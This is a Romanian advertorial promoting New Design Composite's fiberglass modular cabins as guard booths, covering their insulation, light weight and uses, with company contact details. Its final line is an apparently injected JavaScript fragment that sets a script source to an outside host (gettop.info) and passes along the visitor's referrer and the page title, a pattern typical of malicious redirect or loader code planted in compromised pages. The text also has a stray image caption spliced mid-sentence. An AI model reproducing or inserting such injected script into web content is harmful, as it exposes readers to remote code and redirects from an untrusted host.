Utilizeaza si tu cabine modulare pe post de cabine de paza!

Stiai ca poti folosi cabine modulare pe post de cabine de paza pentru portari? Aceste cabine au numeroase avantaje care le fac extrem de cautate in zilele noastre. De unde le poti achizitiona? De la New Design Composite, desigur, o companie din Pitesti care de peste 10 ani iti pune la dispozitie cabine modulare de calitate, la preturi competitive, cabine ce le poti folosi si pe post de cabine de paza, dar si ca puncte vamale, birouri, tonete de vanzari, puncte de vanzare sau gherete de politie.

Cabine modulare te ajuta in orice situatie!

 

Utilizeaza si tu cabine modulare pe post de cabine de paza!Crezi ca o cabina de paza pentru portari trebuie sa fie in mod obligatoriu o constructie in sine, o constructie care are la baza caramida, cimentul si varul? Traim doar in secolul XXI si acum lucrurile sunt mult mai simple sau, in fine, au reusit sa fie simplificate de catre minti luminate, am spune noi.

Deci, in cazul in care ai nevoie urgenta de o cabina de paza pentru un portar – nu conteaza motivele: ca nu mai ai loc in cabina veche, ca ghereta este prea subreda sau ca vrei o cabina intr-o alta zona – exista o solutie salvatoare ce poarta numele de cabine modulare.

Ce sunt cabine modulare? Acestea au la baza placile duble de poliester utilizate pentru confectionarea de placi durabile si rezistente. La exterior aceste placi sunt armate cu fibra de stica, pe cand la interior sunt injectate cu spuma poliuretanica. De ce? Deoarece in acest mod se asigura o mai buna izolare atat fonica, cat si termica, iar aspectul final este cel de tip sandwich.

De asemenea, trebuie sa amintim si de avantajele fibrei de sticla utilizata pentru cabine modulare ce vor fi folosite pe post de cabine de paza pentru portari:

– Fibra de sticla permite ca o cabina modulara sa aiba o greutate redusa, ceea ce face ca manipularea ei sa fie foarte usoara, neavand nevoie de niciun utilaj special;

– Cabine modulare se pot instala oriunde;

– Au intrebuintari diverse;

– Izolatia termica si cea fonica sunt excelente pentru acest gen de cabine de paza pentru portari;

– Rezista foarte bine la conditiile meteo, de la ploaie, vant si ninsori pana la canicula;

– Aspectul comercial este si el un punct forte pentru cabine modulare.

Alege calitatea, alege cabine modulare de la New Design Composite!

 

Cabine modulare, zeci de modele variate, gasesti de vanzare la compania pitesteana New Design Composite. Daca ai nevoie de cabine de paza, cabinele modulare Utilizeaza si tu cabine modulare pe post de cabine de paza!1pot fi transformate in astfel de gherete, dovedindu-si din plin utilitatea.

Ce fel de cabine modulare pentru paza iti ofera New Design Composite? Poti alege cabine modulare pentru o singura persoana, pentru doua sau chiar pentru mai multe persoane. Important este ca aceste cabine modulare sunt standard si sunt dotate cu instalatie electrica completa, dar si cu instalatie pentru telefonie fixa. Nu lipsesc nici ferestrele si usile specifice unei cabine de paza.

De mici sau de mari dimensiuni, pentru paza sau pentru vanzare, cabine modulare de la New Design Composite sunt o solutie la indemana, practica, perfect functionala si, pe deasupra, ieftina.

Daca vrei sa te bucuri de calitate, alege cabine modulare de la New Design Composite. Ai nevoie de informatii suplimentare despre firma si produsele New Design Composite? Pentru detalii si comenzi, suna la numarul 0248-217.850 sau trimite un e-mail pe adresa office@newdesigncomposite.ro.

Articol oferit de zoom-biz.ro.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;